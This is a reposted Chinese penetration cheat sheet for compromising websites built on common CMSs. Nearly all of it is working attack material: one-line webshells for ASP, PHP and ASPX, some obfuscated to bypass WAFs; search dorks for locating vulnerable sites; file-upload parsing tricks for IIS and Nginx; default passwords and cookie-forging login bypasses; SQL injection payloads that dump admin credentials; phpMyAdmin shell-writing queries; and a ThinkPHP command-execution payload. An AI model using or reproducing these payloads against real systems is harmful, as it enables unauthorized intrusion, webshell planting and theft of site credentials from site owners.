版权和内容说明:
这篇文章不是本站编写,是从网络上摘抄的,但是经过了本站的改写优化,并将内容,格式规范化。
本篇说明:这篇文章结合了前辈们前几年一路挖掘出来的主流程序漏洞以及思路 , 小编写在前面是想让大家大致了解一下,因为《渗透 课程》以后的内容,就是围绕着本篇所涉及的内容进行深度逻辑原理剖析。
这是一篇比较完全的基本渗透笔记。看不懂没关系,后面会一一讲解不过本章的内容读者们要尽量保存,可能会在拿站的时候应用到呢!
常见网站程序asp类:
foosun(风讯)
kesion(科汛)
newasp(新云)
乔客CreateLive(创力)
5uCMSKingCMS
DvBBS(动网)
BBSxp[博客]zblog
PHP类:
DeDeCms(织梦)
ECMS(帝国)
PHPCMS
PHP168
HBcms(宏博)SupeSite
CMSware(思维)Joomla!
[BBS]Discuz!
[BBS]phpWind[SNS]UCenterHome
[SNS]ThinkSNS[商城]EcShop
[商城]ShopEx[博客]WordPress
[维基]HDWiki
[微博]PHPsay[DIGG]PBdigg
PHP程序来源默认绝对路径
开源系统 数据库配置文件名 文件名所在的目录
Discuz! config.inc.php ./ config.inc.php
Phpcms config.inc.php ./include/config.inc.php
Wodpress wp-config.php ./ wp-config.php
Phpwind sqlconfig.php ./data/sqlconfig.php
phpweb config.inc.php ./config.inc.php
Php168v6 mysql_config.php ./php168/ mysql_config.php
Shopex config.php ./config/config.php
Ecshop config.php ./data/config.php
Joomla configuration.php ./ configuration.php
UCenter config.inc.php ./data/config.inc.php
EmpireCMS config.php ./e/class/config.php
Dedecms common.inc.php .data/common.inc.php
Zen Cart configure.php ./includes/configure.php
Mediawiki localsettints.php ./config/localsettints.php
Ecshop config.php ./data/config.php
osCommerce configure.php ./includes/configure.php
【 谷歌语法 】
site:可以限制你搜索范围的域名.
inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.
intext: 只搜索网页部分中包含的文字(也就是忽略了标题、URL等的文字)
intitle: 查包含关键词的页面,一般用于社工 别人的webshell密码
filetype:搜索文件的后缀或者扩展名
intitle:限制你搜索的网页标题.
link: 可以得到一个所有包含了某个指定URL的页面列表.
查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
查找可注入点:site:域名 inurl:aspx|jsp|php|asp
查找上传漏洞:site:域名 inurl:file|load|editor|Files
找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的数据库:site:域名 filetype:mdb|asp|#
查看脚本类型:site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵:inurl:cms/data/templates/images/index/
网络设备关键词:intext:WEB Management Interface for H3C SecPath Series
【 一句话木马 】
asp一句话木马:<%eval request(“x”)%>
php一句话木马:
aspx一句话:<%@ Page Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>
网站配置、版权信息专用一句话:”%><%Eval Request(x)%>
一句话再过护卫神:<%Y=request(“x”)%> <%execute(Y)%>
过拦截一句话木马:<% eXEcGlOBaL ReQuEsT(“x”) %>
asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%
能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg
突破安全狗的一句话:<%Y=request(“x”)%> <%eval(Y)%>
elong过安全狗的php一句话:
后台常用写入php一句话(密码x):
<?
$fp = @fopen(“c.php”, ‘a’);
@fwrite($fp, ‘<‘.’?php’.”rnrn”.’eval($_POST[x])’.”rnrn?”.”>rn”);
@fclose($fp);
?>
高强度php一句话:
新型变异PHP一句话(密码b4dboy):
($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);
突破安全狗的aspx一句话:<%@ Page Language=”C#” ValidateRequest=”false” %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
突破护卫神,保护盾一句话:
许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。
改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的。
PHP高强度一句话:
菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c
菜刀连接 躲避检测 密码:c
【 解析漏洞总结 】
IIS 6.0
目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。
后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
默认解析:/xx.asa /xx.cer /xx.cdx
IIS6.0 默认的可执行文件除了 asp 还包含这三种
此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
IIS 7.0/ IIS 7.5/ Nginx <8.03
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。
常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件
yy.txt 内容 ’);?>
意思为写入一个内容为 名称为shell.php的文件
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。
.然后就在图片目录下生成一句话木马 shell.php 密码 cmd
【 ewebeditor编辑器 】
默认后台:ewebeditor/admin_login.asp
帐号密码:admin admin
样式设计:ewebeditor/admin_style.asp
查看版本:ewebeditor/dialog/about.html
数据库路径:db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名)
遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..
跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=.. (dir为列目录, ..为返回上层目录),形式:dir ../..
点上传文件管理-随便选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)
( ewebeditor5.5版本 )
默认后台:ewebeditor/admin/login.asp
帐号密码:admin 198625
数据库路径:data/%23sze7xiaohu.mdb
遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../
调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup
( ewebeditor3.8 php版本 )
默认后台:eWebEditor/admin/login.php
首先随便输入一个帐号和密码,接着系统会提示出错,这时清空浏览器的url,然后输入以下代码后连按三次回车键:
javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));
接着访问文件:ewebeditor/admin/default.php 就可以直接进入后台了。
( ewebeditor编辑器exp手册 )
有时候什么后缀都上传了,还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试
一:文件上传成功了,但是访问不成功,说明该目录(比如:/UploadFile)被设置了权限,返回去换成/ 上传到根目录就行了.增加asp等不行的时候,可以利用解析asp;jpg
二:下载数据库查看前人留下的痕迹,再访问上传页面拿shell。
页面路径:/ewebeditor.asp?id=48&style=popu7 用工具 浏览数据库找到已添加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在语句里访问,上传相对应的格式木马。
【 fckeditor编辑器 】
查看版本:fckeditor/editor/dialog/fck_about.html
编辑器页面:FCKeditor/_samples/default.html
上传页面:fckeditor/editor/filemanager/connectors/test.html
遍历目录:FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
编辑页面:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
查看文件上传路径:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=
( 拿shell方法总结 )
ASPX的站几乎都用fck编辑器,建议用工具扫一下,记住inc目录下可能存在fck编辑器,扫下这个目录。
一:如果是iis6.0,上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录,再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell
二:第一次上传1.asp;1.jpg,被重命名为:1_asp;1.jpg,但是第二次上传1.asp;1.jpg,就有可能变成:1.asp;1(1).jpg
三:iis7.5+fck的解析文件为:a.aspx.a;.a.aspx.jpg..jpg.aspx
四:如果不是iis6.0 上传1.asp;jpg然后抓包,接下来改包,将分号变成空格,再用c32把20改成00,保存,利用%00 截断分号两次
五:成功访问别人的一句话木马页面,http://xx.com/UploadFilesEditorFilefile/2.asp;2(1).jpg 但不知道密码
http://xx.com/UploadFilesEditorFilefile2_asp;2.jpg 这个是图片木马,没有成功利用iis6.0解析漏洞还是图片,下载下来用记事本打开找到密码。
六:IIS7.0/7.5 通杀oday,把php一句话木马后缀改成1.jpg传上去,找出一句话的路径后,在1.jpg的后面添加/.php 例如:http://www.xxx.com/iges/php.jpg/.php
( 建立文件夹 . 变 _ 的突破方法 )
利用Fiddler web debugger 这款工具来进行修改数据包,从而达到突破的目的。
注意:安装Fiddler web debugger,需要安装.net环境以及.net的SP2补丁方可运行!
1.打开fck的上传页面,例如:fckeditor/editor/filemanager/browser/default/connectors/test.html
2.再打开Fiddler web debugger这款工具,点击设置–自动断点–选择 “请求之前”
3.接着打开fck的上传页面,创建文件夹,并输入你想要创建的文件名,例如:x.asp
4.然后返回到Fiddler web debugger这款工具里,选择链接–点击右侧的嗅探
5.修改currentfolder内的参数,改成你要建立的文件夹名字,如:x.asp
6.然后点击右侧的:run to completion
7.再点击软件设置–自动断点–禁用,再到浏览器里点击确定建立文件夹,你就会发现文件夹建立为x.asp了
【 linux 】
解析格式:1.php.xxx (xxx可以是任意)
如果apache不认识后缀为rar的文件,我们就用1.php.rar格式上传,文件就会被服务器 当做PHP脚本解析。
辨别linux系统方法:例如:http://www.xxx.com/xxx/abc.asp?id=125 把b换成大写B访问,如果出错了,就说明是linux系统,反之是windows系统.
【 旁注 】
旁注的技巧就是挑选支持aspx的站来日,这样提权时候希望较大,如何探测服务器上哪些站点支持aspx呢? 利用bing搜索:http://cn.bing.com/ 搜索格式:ip:服务器ip aspx
比如要入侵一个网站,想知道该网站支不支持aspx,就在网站后面随便加上一个xxx.aspx回车,如果显示的不是iis默认的错误页面,而是这种:“/”应用程序中的服务器错误,说明支持aspx马。
【 phpmyadmin 】
查看版本:test.php 或 phpinfo.php
默认账号密码:root root
万能帐号密码:’localhost’@’@” 密码空
拿shell第一种方法:
CREATE TABLE mysql.darkmoon (darkmoon1 TEXT NOT NULL );
INSERT INTO mysql.darkmoon (darkmoon1 ) VALUES (‘’);
SELECT darkmoon1 FROM darkmoon INTO OUTFILE ‘d:/wamp/www/darkmoon.php’;
DROP TABLE IF EXISTS darkmoon;
拿shell第二种方法:
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘’);
select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;
Drop TABLE IF EXISTS moon;
拿shell第三种方法:
select ‘’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’
拿shell第四种方法
select ‘’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’
127.0.0.1/darkmoon4.php?cmd=net user
找到mysql数据库,执行sql语句即可写入一句话,再菜刀连接即可。
phpmyadmin脱裤
在这里面是可以直接拖库的,如同上传php拖库脚本一样,操作差不多的。
修改mysql默认的root用户名方法:
进入phpmyadmin,进入mysql表,执行sql语句
1.update user set user=’你的新root用户名’ where user=’root’;
2.flush privileges;
例如:
用root身份登入,进入mysql库,修改user表即可。
1.use mysql;
2.mysql>update user set user=’newName’ where user=’root’;
3.mysql> flush privileges;
【 万能密码 】
( php )
帐号:’ UNION Select 1,1,1 FROM admin Where ”=’
密码:1
( asp )
‘xor
‘or’=’or’
‘or”=”or”=’
‘or ‘1’=’1’or ‘1’=’1
‘or 1=1/*
【 批量关键词 】
inurl:asp?id=
inurl:detail.php?
CompHonorBig.asp?id= 很不错的的一个搜索注入点
inurl:show.asp? 非常强大
site:www.yuming.com
inurl:articleshow.asp?articleid=数字
inurl:szwyadmin/login.asp
inurl:asp?id=1 intitle:政府
杭州 inurl:Article_Class2.asp?
【 木马后门 】
1.TNTHK小组内部版 —— 存在关键词后门,随便输入一个错的密码,右键查看源文件,找到错误关键词后面的font,在font后面的就是正确密码。
2.不灭之魂—不死僵尸变种 —— 用这款工具专门爆这款大马的密码:爆不灭之魂密码
3.终极防删免杀多功能VIP版本-无后门 —— 万能密码:wbgz 菜刀连接:kk
【 安全狗 】
1.过注入
方法一:a.asp?aaa=%00&id=sql语句
方法二: a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin
2.过大马被阻拦访问
方法一:上传一个大马 然后访问http://sss.com/dama.asp ; 访问后出现拦截。
那么解决方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –> 这样再访问da.asp 就不会被拦截了。
3.过菜刀连接一句话被拦截
方法一:不用菜刀连接一句话,用别的一句话连接端。
方法二:中转下连接菜刀,把过滤掉的词替换掉。
【 本地构造上传漏洞 】
寻找程序上传漏洞,必须从上传页面的源文件入手,目标有两个:
1.filename (文件名称) 在上传页面中针对文件扩展名过滤不严,从而上传可执行的脚本木马。
2.filepath (文件路径) 在上传页面针对路径过滤不严,导致可以修改上传相对路径上传脚本木马。
当检测到一个上传页面,asp、asa后缀已经被过滤掉的时候,可以尝试抓包明小子或NC上传!
不行就利用本地上传漏洞构造上传!例如上传页面是:http://www.xx.com/upfile_other.asp
1.右键查看源文件,找到这段代码:
”
Response.end
end if
%>2.然后保存,千万别跳转任何页面,直接在IE地址栏内将 admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin=5203.成功后会进入一个像小马一样的页面,粘贴木马代码以及写上木马文件名即可拿到wshell,木马在inc目录。
==========================================================================================================================
【 aspcms】
简要描述:后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。
爆帐号密码:
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
版本不同需要更改值。
第二种方法,找到后台,然后/admin/_system/AspCms_SiteSetting.asp?action=saves
直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn
& smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1
& LanguageID=1[/php]
再连接配置文件config.asp 密码为#
老版本中可以通过添加模板直接添加asp.但是新版已经限制了添加模板的格式为html,js,css
当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.
方法:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,文件内容写一句话<%eval request(“g”)%>
然后添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话了,用菜刀连接即可!
可是如果遇到iis7.5呢? 以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
1、进入后台,“扩展功能”–“幻灯片设置”–”幻灯样式”
2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><% 3、一句话木马,密码a。在/config/AspCms_Config.asp ==========================================================================================================================
【 XYCMS企业建站系统 】
关键词:inurl:showkbxx.asp?id= 默认数据库:data/xy#!123.mdb 默认账户密码:admin admin 找到网站配置,在网站名称里面直接插入一句话:网站”%><%eval request(“x”)%><%’,注意不要删掉网站名称!然后中国菜刀连接:/inc/config.asp
【 szwyadmin漏洞绕过后台验证 】
关键字:inurl:szwyadmin/login.asp
javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”admindj=”+escape(“1″));
1.后台一般存在一个szwyadmin文件夹,复制一下后台地址放在一边,之后复制代码替换后台地址访问进行注射!
2.这时会弹出一个窗口,连续点击三次确定。
3.重新访问后台地址,把网站后面的/login.asp 换成 admin_index.asp 奇迹般的直接进入后台了!
==========================================================================================================================
【 医院建站系统任意文件上传漏洞 】
关键词:inurl:cms/Column.aspx?
关键词:inurl:cms/Column.aspx?LMID=
漏洞利用 :xtwh/upfile.aspx
直接上传aspx木马拿shell。
==========================================================================================================================
【 嘉友科技cms上传漏洞 】
谷歌关键字:inurl:newslist.asp?NodeCode=
程序采用的上传页uploadfile.asp未进行管理验证,导致建立畸形目录上传图片木马获取shell漏洞。
exp:ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp他原上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
而且他的上传文件没有过滤导致未授权访问,直接上传小马,然后小马后面写为1.jpg 访问路径 查看源代码。
==========================================================================================================================
【 ecshopcms后台拿shell 】
支持最新2.7.2版本,通杀最新版本后台低权限!
后台-订单管理-订单打印-选择源代码编辑-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:usb
==========================================================================================================================
【 教育站sql注入通杀0day 】
关键词:inurl:info_Print.asp?ArticleID=
默认后台:www.xx.com/ad_login.asp
比如:http://www.xx.com/info_Print.asp?ArticleID=539
加上:union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
这样就直接得到了管理员账户和经过Md5加密的密码了。
==========================================================================================================================
【 IIS7.0 畸形解析漏洞通杀oday 】
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP一句话图片木马缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php xx随便你怎么填,只要后缀为.php就好,之后菜刀连接即可!
==========================================================================================================================
【 Yothcms 遍历目录漏洞 】
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
默认后台:admin/login.asp
遍历目录:ewebeditor/manage/upload.asp?id=1&dir=../
数据库路径:%23da%23ta%23%23db_%23data%23%23.asa
==========================================================================================================================
【 传信网络独立开发网站源码0day漏洞 】
默认后台:system/login.asp
编辑器后台路径:ubbcode/admin_login.asp
数据库路径:ubbcode/db/ewebeditor.mdb
默认账号密码:yzm 111111
==========================================================================================================================
【
科讯cms 6.5后台拿shell 】
1.可以在数据库备份中找到网站的绝对路径
2.利用科讯SQL注入漏洞利用工具也能找到进入后台后执行sql命令:
create table E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd (a varchar(50))
insert into E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾’)
接着数据库备份成1.asp 菜刀连接密码:#
==========================================================================================================================
【 动易2006后台拿shell 】
进入后台后,我们在左边菜单栏中选择“系统设置”,然后在出现的菜单栏里选择“自定义页面管理”,
接着需要先添加一个自定义页面分类,选择“添加自定义分类”这个选项,分类名称与分类简介都可以随便填写。填写完毕后选择“添加”,系统提示添加成功。
下面再来选择“添加自定义页面”,“页面名称”随便输入,“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管,保持默认.
不过如果没有改页面路径的话,默认生成的文件是在根目录下的,也就是http://www.xx.com/maer.asp.“文件名称”即输入生成的木马的文件名。
“页面简介”也不用管,下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。
选择“自定义页面管理首页”,点击右边出现的“生成本页”就OK 了,成功获得动易的shell。
==========================================================================================================================
【 Shopex4.8.5 注入漏洞后台拿shell 】
关键词:powered by shopex v4.8.5
exp:Shopex 4.8.5 SQL Injection Exp
Shopex 4.8.5 SQL Injection Exp (product-gnotify)
fuck
保存为html格式,替换代码中的网站,本地打开后点击小图标,出现新页面,帐号密码爆出来了,默认后台:shopadmin
拿shell方法….
第一步 页面管理 修改模版 然后选一个XML编辑
开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来
然后改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=
解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel
我这里是一句话 你们懂的 然后提交了之后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称
—————————————————————————————————————————————————————-
【 ecshop漏洞总汇 】
关键字:powered by ecshop普通代码:user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。拿shell方法很简单,找到“库项目管理”再选择“配送的方式”,在代码最下面插入php一句话木马: 不行就换php木马的预代码!
接着保存,一句话路径是:http://www.xxx.org/myship.php ; 打开“ASP+PHP两用Shell.html”填入地址,点击一下环境变量,成功之后点击上传文件就可以拿shell了。
—————————————————————————————————————————————————————-
【 帝国cms 6.6最新版本 】
自定义页面-增加自定义页面-随便写个.php文件名,内容写:
如果内容直接添一句话或者php大马是无用的,因为他会生成xxx.php前先给你执行,
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 的base64加密。
所以生成xxx.php后 会出现内容 在文件里,然后用菜刀直接连接吧。
—————————————————————————————————————————————————————-
【 phpweb 】
关键字:inurl:down/class/index.php?myord=
后台地址:admin.php
万能密码:admin ‘or ‘1’=’1
注入地址:down/class/index.php?myord=1
表段:pwn_base_admin
拿shell通杀漏洞:登入后台–文章–文章发布–文章内容里的图片上传按钮–抓包之后改包NC提交。
也可以用下面的exp拿shell:
用火狐浏览器登录后台,因为火狐浏览器有保留cookies的功能, 找到“phpweb之exp”这个html,拉进火狐浏览器器里上传1.php;.jpg的一句话木马,查看源码菜刀连接!
—————————————————————————————————————————————————————-
动科(dkcms)漏洞:
官方网站:www.dkcms.com主要是差不多3个版本为主吧,
V2.0 data/dkcm_ssdfhwejkfs.mdb
V3.1 _data/___dkcms_30_free.mdb
V4.2 _data/I^(()UU()H.mdb
默认后台:admin
编辑器:admin/fckeditor
后台拿shell,fck编辑器突破可拿shell
建立asp文件夹
Fck的路径:Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp
—————————————————————————————————————————————————————-
ESPCMS通杀0day :
关键字:inurl:index.php?ac=article&at=read&did=
默认后台:adminsoft/index.php siteadmin/index.php
注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆帐号:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
帐号和密码一次性爆:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
进到后台后,直接点击分类图片-修改-选择文件-直接上传php一句话木马
PS:当上传不了php木马时,去系统设置一下,添加图片上传格式 |php ,这样就可以上传一个图片文件头的php木马。
—————————————————————————————————————————————————————-
Thinkphp框架任意代码执行漏洞 :
ThinkPHP是一款国内使用比较广泛的老牌PHP MVC框架
关键字:thinkphp intitle:系统发生错误
获取Thinkphp的版本号:index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
获取服务器的配置信息:index.php/module/aciton/param1/${@phpinfo()}
列出网站所有文件列表:index.php/module/action/param1/{${system($_GET[‘x’])}}?x=ls -al
直接在网页执行一句话:index.php/module/action/param1/{${eval($_POST展开)}}
菜刀连接:http://www.xxx.com/index.php/module/action/param1/{${eval($_POST展开)}} 密码:s
—————————————————————————————————————————————————————-
良精系统 :
( 爆管理员帐号密码的代码 )
NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’
( 一句话木马的妙用 )
插入一句话木马后,连接网站的配置文件:inc/config.asp 密码都是g
1.网站配置-允许的上传文件类型-插入闭合的一句话木马:”%><%eval request(“g”)%><%s=” 不行就增加一个cer格式,之后上传cer格式的木马即可 2.网站配置-网站地址-插入闭合的一句话木马:http://”%><%execute(request(“g”))%><%’ 3.网站配置-网站名称-插入闭合的一句话木马:沧州临港彩越化工有限公司”%><%eval request(“g”)%><%s=” 4.网站配置-版权信息-插入闭合的一句话木马:”%><%eval(request(chr(103)))%><%’
( 利用upfile_other.asp漏洞拿shell )
直接访问会员中心:userreg.asp
注册一个用户并在未退出登录的状态下,使用双文件上传工具足以爆它菊花,以下代码保存为1.html,并里面的修改目标站,第一个上传jpg,第二个上传cer
另外可以利用会员中心的cookies,用火狐浏览器登陆之后,访问upfile_other.asp页面,用抓包工具去抓包,接着用明小子上传拿shell.
( 上传漏洞 )
漏洞文件:Upfile_Photo.asp
前提是进入后台了,访问这个文件,将提示“请先选择你要上传的文件!”,用抓包工具抓管理员的cookies,再把上传地址跟cookies扔到名小子里上传拿shell
( 南方在线编辑器 )
默认后台:admin/Southidceditor/admin_style.asp
数据库路径:admin/SouthidcEditorDatasSouthidcEditor.mdb
遍历目录:admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..
文件上传页面:admin/Southidceditor/ewebeditor.asp?id=57&style=southidc
样式设置页面:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
—————————————————————————————————————————————————————-
dedecms注入漏洞及找后台技巧 :
访问这个:plus/search.php?keyword=as&typeArr[ uNion ]=a
看结果如果提示:Safe Alert: Request Error step 1 !那么直接用下面的exp爆出所有管理员的帐号密码:
plus/search.php?keyword=as&typeArr[111%3D@')+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@'+]=a
看结果如果提示:Safe Alert: Request Error step 2 !
那么直接用下面的exp爆出所有管理员的帐号密码
plus/search.php?keyword=as&typeArr[111%3D@')+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%23@__admin%23@'+]=a
有些/plus/目录换成了/plugins/目录,这时就要把/plus/换成/plugins/进行注射了
破解出md5为20位结果,只需要把前三位和后一位去掉,剩余16位拿去解密即可
如何找后台?
默认后台:dede
第一种方法:data/mysql_error_trace.inc (有时可以爆出路径)
第二种方法:把域名作为后台去尝试
第三种方法:查看这个文件:robots.txt
第四种方法:ping下域名获得ip之后,http://www.bing.com/ 搜索:ip:127.0.0.1 php (可能获得后台也可以获得其他旁注站,一般dede的旁站很多也是dedecms的)
—————————————————————————————————————————————————————-
PHPcms V9 爆数据库信息漏洞:
直接爆出数据库连接信息:/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
关于后台拿webshell:进入后台后点击界面–模版风格–随便找个页面点击修改,插入我们的一句话代码
@fwrite($fp, ‘<‘.’?php’.”rnrn”.’eval($_POST[0day])’.”rnrn?”.”>rn”);
点击保存,接着点击可视化,代码就成功执行了,接着菜刀连接/0day.php,密码0day